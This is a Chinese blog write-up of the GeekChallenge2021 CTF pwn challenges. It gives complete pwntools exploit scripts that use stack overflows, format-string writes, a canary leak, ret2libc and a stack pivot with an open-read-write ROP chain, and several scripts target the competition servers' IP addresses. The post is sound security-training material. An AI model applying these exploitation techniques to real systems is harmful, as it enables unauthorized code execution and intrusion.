PWN-COMPETITION-GeekChallenge2021

最新推荐文章于 2024-09-25 09:13:33 发布
最新推荐文章于 2024-09-25 09:13:33 发布
阅读量765 收藏 2
点赞数
分类专栏: Pwn-Competition 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/121014301
版权
本文档展示了多个利用栈溢出和格式化字符串漏洞获取Shell的实例,包括数学游戏脚本、ret2xxone、恋爱小游戏2.0、easyfmt、easycanary、ret2baby以及pwn777等挑战的解决策略。通过调试、栈溢出和格式化字符串漏洞,成功实现对程序控制流的篡改,最终获取目标系统的Shell。
摘要由CSDN通过智能技术生成

PWN-COMPETITION-GeekChallenge2021

check in

66s内解答200道四则运算的题目即可getshell
参与运算的数和运算符都会打印,直接写脚本即可

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./math")
io=remote("123.57.230.48",12343)
elf=ELF("./math")

for i in range(200):
	io.recvuntil("num1:")
	num1=int(io.recvuntil("\n")[:-1])
	io.recvuntil("num2:")
	num2=int(io.recvuntil("\n")[:-1])
	io.recvuntil("this calculation is ")
	sign=io.recvuntil("\n")[:-1]
	ans=0
	if sign=="+":
		ans=num1+num2
	elif sign=="-":
		ans=num1-num2
	elif sign=="*":
		ans=num1*num2
	else:
		ans=num1/num2
	io.sendlineafter("your answer!!:\n",str(ans))

io.interactive()

恋爱小游戏

栈溢出覆写栈上变量的值使满足if即可getshell,可直接在命令行输入payload
gane-flag

ret2xxone

Geek函数中存在栈溢出漏洞,前提是先输入一个数和程序产生的随机数相同
ret2xxone
由于程序没有通过srand()函数设置随机数种子,所以每次运行程序时,程序产生的随机数都是相同的,可以通过调试得到
在0x0804860C处下断点,程序调用rand()后,返回值EAX即为程序产生的随机数,这里为0x6b8b4567
ret2xxone-randnum
之后就是利用栈溢出getshell

# -*- coding:utf-8 -*-
from pwn import *
io=process("./ret2xx")
elf=ELF("./ret2xx")
system_plt=elf.plt["system"]
binsh=0x080486D0

io.recvuntil("to solve it!\n")
num=0x6b8b4567
io.send(p32(num))

payload="a"*(0x1A+4)+p32(system_plt)+p32(0xdeadbeef)+p32(binsh)
io.send(payload)

io.interactive()

恋爱小游戏2.0

栈溢出,原理和1.0一样,注意在命令行输入payload后不能用回车,要用Ctrl+D来结束输入
game-flag
或者写脚本,payload最后设为"\x00"即可

# -*- coding:utf-8 -*-
from pwn import *
io=remote("47.242.20.238",10000)
payload="a"*24+"loveyou\x00"
io.send(payload)
io.interactive()

easyfmt

格式化字符串漏洞,第一次覆写栈上变量的值,第二次覆写返回地址
backdoor关闭了标准输出流,使用exec实现重定位,再cat flag即可

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./format_string")
io=remote("123.57.230.48",12342)
elf=ELF("./format_string")

#gdb.attach(io,"b * 0x08048685")
#pause()

io.recvuntil("First step:\n0x")
v3_addr=int(io.recvuntil("\n")[:-1],16)
print("v3_addr=="+hex(v3_addr))

payload=p32(v3_addr)+"%8c%15$hn" # len(payload)==13
io.send(payload)

backdoor=0x0804874D
ebp_sub_8=v3_addr+0x10
io.recvuntil("you enter there\n")
payload=p32(ebp_sub_8)+"%"+str(backdoor&0xff-4)+"c%7$hhn"
print(len(payload))
io.sendline(payload)

io.sendline("exec 1>&2")
io.sendline("cat flag")
#pause()

io.interactive()

easycanary

格式化字符串泄露canary,read利用栈溢出覆写返回地址getshell

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./stackguard1")
io=remote("123.57.230.48",12344)
elf=ELF("./stackguard1")

#gdb.attach(io,"b * 0x4012A3")
#pause()

payload="%11$p"
io.sendline(payload)
io.recvuntil("0x")
canary=int(io.recv(16),16)
print("canary=="+hex(canary))

backdoor=0x4011D6
payload="a"*(0x30-8)+p64(canary)+"b"*8+p64(backdoor)
io.sendline(payload)

#pause()

io.interactive()

ret2baby

main函数中说有两次机会,其实一次就可以getshell了
input函数中要求输入一个position,范围为[0,20],将这个position传入game函数中
对game函数的分析标注在注释中
ret2-vuln
当game函数第32行的if语句成立时,可以造成栈溢出,脚本如下

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./ret2")
io=remote("123.57.230.48",12346)
elf=ELF("./ret2")

binsh=0x4014d4
pop_rdi=0x401273
ret=0x400318

io.recvuntil("please input your position\n")
io.sendline("20")

io.recvuntil("plz input your value\n")
io.sendline("0")

io.recvuntil("this is a gitf 0x")
system=int(io.recv(12),16)
print("system=="+hex(system))

payload="a"*(0x12+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)

io.sendline(payload)

io.interactive()

pwn777

此题开了沙箱,ban了execve系统调用,于是考虑orw
game函数中利用栈溢出覆写随机数种子为0,绕过随机检测
fmt()函数中存在bss段上的格式化字符串漏洞,参考:bss上的格式化字符串漏洞
此题除了game函数中存在栈溢出,其它函数中都不存在可实现rop的条件,要想实现orw还需要栈迁移

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
context.arch="amd64" # 下面asm()找gadget需要
#io=process("./pwn01")
io=remote("47.242.20.238",7777)
elf=ELF("./pwn01")
libc=ELF("./libc-2.23.so")

#offset=0x1621
#io_base = io.libs()[io.cwd + io.argv[0].strip('.')]
#gdb.attach(io,"b * "+str(io_base+offset))
#pause()

io.recvuntil("input your name\n")
name="a"*16+p64(0)+p32(0) # 栈溢出,将随机数种子设为0
io.send(name)

num=[1804289383,846930886,1681692777,1714636915,1957747793,424238335,719885386,1649760492,596516649,1189641421]
for i in range(10):
	io.recvuntil("input your number:")
	io.sendline(str(num[i]))

io.recvuntil("try your best!\n")	
payload="%6$p.%7$p.%13$p" #泄露栈地址,程序基地址,libc基址
io.sendline(payload)
io.recvuntil("0x")
stack_addr=int(io.recvuntil(".")[:-1],16) #栈地址
print("stack_addr=="+hex(stack_addr))
io.recvuntil("0x")
proc_base=int(io.recvuntil(".")[:-1],16)-0x166F #程序基地址
print("proc_base=="+hex(proc_base))
io.recvuntil("0x")
libc_base=int(io.recv(12),16)-240-libc.sym["__libc_start_main"] #libc基址
print("libc_base=="+hex(libc_base))
buf_addr=proc_base+0x4060 #buf地址
print("buf_addr=="+hex(buf_addr))

# 依照bss段上的格式化字符串漏洞利用原理,实现栈迁移,需要修改rbp到fake_rbp地址,改写mymain的返回地址到一个leave_ret
# phase 1 start 改写mymain的返回地址到一个leave_ret
rip=stack_addr+0x8
rip_0_2=rip&0xff
print("rip_0_2=="+hex(rip_0_2))
payload="%"+str(rip_0_2)+"c%6$hhn" #这里是偏移为6的链
io.sendline(payload)

leave_ret=proc_base+0x1676
print("leave_ret=="+hex(leave_ret))
ret=leave_ret&0xff
print("ret=="+hex(ret))
payload="%"+str(ret)+"c%10$hhn"
io.sendline(payload)

# phase 1 end

# phase 2 start 改写rbp到fake_rbp地址,由于原本栈上的rbp与fake_rbp地址完全不同,需要分3次各次写2个字节,共6个字节
fake_rbp=buf_addr+0x10
print("fake_rbp=="+hex(fake_rbp))

buf_addr_0_4=(fake_rbp)&0xffff
print("buf_addr_0_4=="+hex(buf_addr_0_4))
payload="%"+str(buf_addr_0_4)+"c%6$hn" #低2字节可以用上面改写返回地址的链直接写,偏移为6的链
io.sendline(payload)

# 中间2字节 和 高2字节 需要找另一条链辅助写,这里是偏移为15的链
stack_addr_add_2=stack_addr+0x2
print("stack_addr_add_2=="+hex(stack_addr_add_2))
stack_addr_add_2=stack_addr_add_2&0xffff
payload="%"+str(stack_addr_add_2)+"c%15$hn"
io.sendline(payload)

buf_addr_4_8=(fake_rbp>>16)&0xffff
print("buf_addr_4_8=="+hex(buf_addr_4_8))
payload="%"+str(buf_addr_4_8)+"c%41$hn"
io.sendline(payload)

stack_addr_add_4=stack_addr+0x4
print("stack_addr_add_4=="+hex(stack_addr_add_4))
stack_addr_add_4=stack_addr_add_4&0xffff
payload="%"+str(stack_addr_add_4)+"c%15$hn"
io.sendline(payload)

buf_addr_8_12=(fake_rbp>>32)&0xffff
print("buf_addr_8_12=="+hex(buf_addr_8_12))
payload="%"+str(buf_addr_8_12)+"c%41$hn"
io.sendline(payload)
# phase 2 end

bss=proc_base+0x4020
syscall = libc_base+0x1015D7 #在libc中找一个syscall的偏移即可
pop_rax_ret = libc_base+libc.search(asm("pop rax; ret")).next() #注意设置context.arch="amd64"
pop_rdi_ret = libc_base+libc.search(asm("pop rdi; ret")).next()
pop_rsi_ret = libc_base+libc.search(asm("pop rsi; ret")).next()
pop_rdx_ret = libc_base+libc.search(asm("pop rdx; ret")).next()

payload="jiaraniloveyou~\x00" # len=16
payload+="./flag".ljust(8,"\x00") #要打开的文件名
# 下面是利用栈迁移实现orw,open,read,write
payload+=p64(pop_rdi_ret)+p64(buf_addr+0x10)+p64(pop_rsi_ret)+p64(0)+p64(pop_rax_ret)+p64(2)+p64(syscall)
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss)+p64(pop_rdx_ret)+p64(0x30)+p64(pop_rax_ret)+p64(0)+p64(syscall)
payload+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss)+p64(pop_rdx_ret)+p64(0x30)+p64(pop_rax_ret)+p64(1)+p64(syscall)
io.sendline(payload)

#pause()

io.interactive()
P1umH0
关注
专栏目录
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 442
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
REVERSE-COMPETITION-GeekChallenge2021
P1umH0的博客
11-15 4878
REVERSE-COMPETITION-GeekChallenge2021
Geek Challenge2022部分web题解
ph0ebus的博客
11-25 1277
进去之后看到一大堆代码,开始审计,可以发现就是绕过死亡exit()以及file_put_contents()的利用,这里还有一个exif_imagetype()的绕过,添加GIF89a文件头绕过即可。/bin目录下的cat文件,通配符只能代替文件,不能代替命令,每一个文件都有一个命令作为载体,用文件和用命令的原理一致,由此可以bypass cat从而获取到flag。可以看到输入的密码被编码了,看结构是哈希,盲猜一手md5,验证一下果然如此,那么开始爆破,给数字编码一下发包。然后使用联合注入,先找出回显点。
Geek Challenge
m0_51376859的博客
01-07 397
Geek Challenge (dfs预处理) Description Geek Challenge [SKRZAT] is an old, old game from Poland that uses a game console with two buttons plus a joy stick. As is true to its name, the game communicates in binary, so that one button represents a zero and the o
fmtbss段(neepusec_easy_format)
huzai9527的博客
05-24 418
fmtbss段(neepusec_easy_format) 1.gdb操作 vmapp stack retaddr 2.思路 先泄漏能够泄漏的地址包括:当前站地址、libc地址 然后通过下面的指令进行地址写 #这里是只要覆盖偏移为12的地址值的后两个字节 debug() offset0 = ret&0xffff payload = '%'+str(offset0)+'c%12$hnxxxx\x00' p.sendline(payload) p.recvuntil('x
bss上格式化字符串处理【buuoj】SWPUCTF_2019_login
weixin_46521144的博客
08-10 1102
这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。 IDA分析 很明显的格式化字符串漏洞,但是是在bss段上 总结一下32位格式化字符串在bss段上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图 通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样 (思考一下为什么要这么写:因为一般的格式化字符
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2019.11.3 unctf babyfmt (格式化字符串任意地址的读和写)
DSR446的博客
11-03 1738
i春秋的一篇关于格式化字符串文章把任意地址的读和写讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1177
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
2020第十一届极客大挑战——Geek Challenge部分wp
monster663的博客
10-26 4046
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
[Geek Challenge 2022] crypto部分
weixin_52640415的博客
11-22 2977
极客 GeekChallenge 2022 CTF crypto
[Geek Challenge 2022]Web部分 writeup by q1jun
ShangYaoPaiGu的博客
11-21 4671
[Geek Challenge 2022]Web writeup
入门到放弃系列 ret2text2
weixin_43489686的博客
09-11 603
ret2text2 这道题依然是入门级别的题目,比上一道题目略难一点,主要区别在于这个题目没有直接给出的后门函数,也就是system函数参数不是/bin/sh,需要自己构造个shell。 首先还是一样先看看这个程序的逻辑,发现这个程序会复述你输入的语句。然后再分别gdb和拖入ida。 main函数点进function里发现逻辑没问题,也有很明显的栈溢出漏洞,其中总偏移量为0x10+8=0x18...
2020第十一届极客大挑战——Geek Challenge(部分解)
热门推荐
weixin_45794666的博客
12-19 2万+
Crypto 二战情报员刘壮 考点:摩斯密码 通过 1.简介中直接看出是摩斯密码 2.通过在线网站直接解密得到flag 铠甲与萨满 考点:凯撒密码 1.通过题目和提示知道是凯撒密码 2.通过CrakTools直接解密找到SYC即可 成都养猪二厂 考点:猪圈密码,栅栏密码 1.[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w1bVRQgi-1608350560768)(http://image.liangyueliangyue.top/writeup-image/image
探索光耦:隔离电压——光耦保障电路安全与性能的关键
最新发布
forvevr的博客
09-25 615
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1340
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值